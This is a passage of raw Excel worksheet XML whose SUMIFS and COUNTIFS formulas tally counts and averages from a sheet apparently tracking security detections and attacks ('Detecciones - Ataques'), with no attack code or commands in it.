      <c r="BT48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>10</v>
      </c>
      <c r="CA48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>23</v>
      </c>
      <c r="CQ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>21</v>
      </c>
      <c r="CT48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ48" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK48" s="271"/>
      <c r="DO48" s="279"/>
      <c r="DP48" s="271"/>
      <c r="DQ48" s="271"/>
      <c r="DR48" s="271"/>
      <c r="DS48" s="271"/>
      <c r="DT48" s="271"/>
      <c r="DU48" s="271"/>
      <c r="DV48" s="271"/>
      <c r="DW48" s="271"/>
      <c r="DX48" s="271"/>
      <c r="DY48" s="271"/>
      <c r="DZ48" s="271"/>
      <c r="EA48" s="271"/>
      <c r="EB48" s="271"/>
      <c r="EC48" s="271"/>
      <c r="ED48" s="280"/>
      <c r="EG48" s="279"/>
      <c r="EH48" s="271"/>
      <c r="EI48" s="309" t="s">
        <v>2448</v>
      </c>
      <c r="EJ48" s="310" t="s">
        <v>6</v>
      </c>
      <c r="EK48" s="310" t="s">
        <v>7</v>
      </c>
      <c r="EL48" s="310" t="s">
        <v>8</v>
      </c>
      <c r="EM48" s="310" t="s">
        <v>9</v>
      </c>
      <c r="EN48" s="311" t="s">
        <v>2515</v>
      </c>
      <c r="EO48" s="329"/>
      <c r="EP48" s="452" t="s">
        <v>2516</v>
      </c>
      <c r="EQ48" s="452" t="s">
        <v>2517</v>
      </c>
      <c r="ER48" s="452" t="s">
        <v>2518</v>
      </c>
      <c r="ES48" s="452" t="s">
        <v>2519</v>
      </c>
      <c r="ET48" s="452" t="s">
        <v>2520</v>
      </c>
      <c r="EU48" s="453"/>
      <c r="EV48" s="275" t="s">
        <v>2521</v>
      </c>
      <c r="EW48" s="2"/>
      <c r="EX48" s="2"/>
      <c r="EY48" s="2"/>
      <c r="EZ48" s="3"/>
      <c r="FA48" s="367"/>
      <c r="FC48" s="334" t="s">
        <v>2462</v>
      </c>
      <c r="FD48" s="335" t="s">
        <v>2478</v>
      </c>
      <c r="FE48" s="368">
        <f>AVERAGE(ET55:ET68)</f>
        <v>0.8453960905</v>
      </c>
      <c r="FF48" s="368">
        <f>AVERAGE(ES55:ES68)</f>
        <v>0.7382910353</v>
      </c>
      <c r="FG48" s="368">
        <f>AVERAGE(ER55:ER68)</f>
        <v>0.7494151425</v>
      </c>
      <c r="FH48" s="369">
        <f>AVERAGE(EQ55:EQ68)</f>
        <v>0.8734131482</v>
      </c>
      <c r="FK48" s="445"/>
      <c r="FL48" s="359"/>
      <c r="FM48" s="359"/>
      <c r="FN48" s="359"/>
      <c r="FO48" s="359"/>
      <c r="FP48" s="359"/>
      <c r="FY48" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="FZ48" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.1666666667</v>
      </c>
      <c r="GA48" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.1666666667</v>
      </c>
      <c r="GC48" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="GD48" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.1684561575</v>
      </c>
      <c r="GE48" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY48)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY48 &amp; "*"))</f>
        <v>0.3333333333</v>
      </c>
    </row>
    <row r="49">
      <c r="B49" s="277"/>
      <c r="C49" s="271"/>
      <c r="D49" s="271"/>
      <c r="E49" s="271"/>
      <c r="F49" s="271"/>
      <c r="G49" s="278"/>
      <c r="J49" s="277"/>
      <c r="K49" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BG3:BG139)</f>
        <v>588</v>
      </c>
      <c r="L49" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CU3:CU139)</f>
        <v>1195</v>
      </c>
      <c r="M49" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EK3:EK139)</f>
        <v>1538</v>
      </c>
      <c r="N49" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GA3:GA139)</f>
        <v>1564</v>
      </c>
      <c r="O49" s="278"/>
      <c r="Q49" s="271"/>
      <c r="R49" s="352" t="s">
        <v>2501</v>
      </c>
      <c r="S49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3708</v>
      </c>
      <c r="T49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>126</v>
      </c>
      <c r="V49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>40</v>
      </c>
      <c r="W49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="X49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>53436</v>
      </c>
      <c r="Y49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>415</v>
      </c>
      <c r="Z49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>159484</v>
      </c>
      <c r="AA49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="AB49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>202</v>
      </c>
      <c r="AC49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>51</v>
      </c>
      <c r="AD49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>820</v>
      </c>
      <c r="AE49" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>43</v>
      </c>
      <c r="AF49" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6005</v>
      </c>
      <c r="AG49" s="271"/>
      <c r="AH49" s="352" t="s">
        <v>2501</v>
      </c>
      <c r="AI49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3702</v>
      </c>
      <c r="AJ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>6</v>
      </c>
      <c r="AL49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>108</v>
      </c>
      <c r="AR49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>5</v>
      </c>
      <c r="AS49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>2</v>
      </c>
      <c r="AU49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>26</v>
      </c>
      <c r="AY49" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CO3:$CO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ49" s="355">
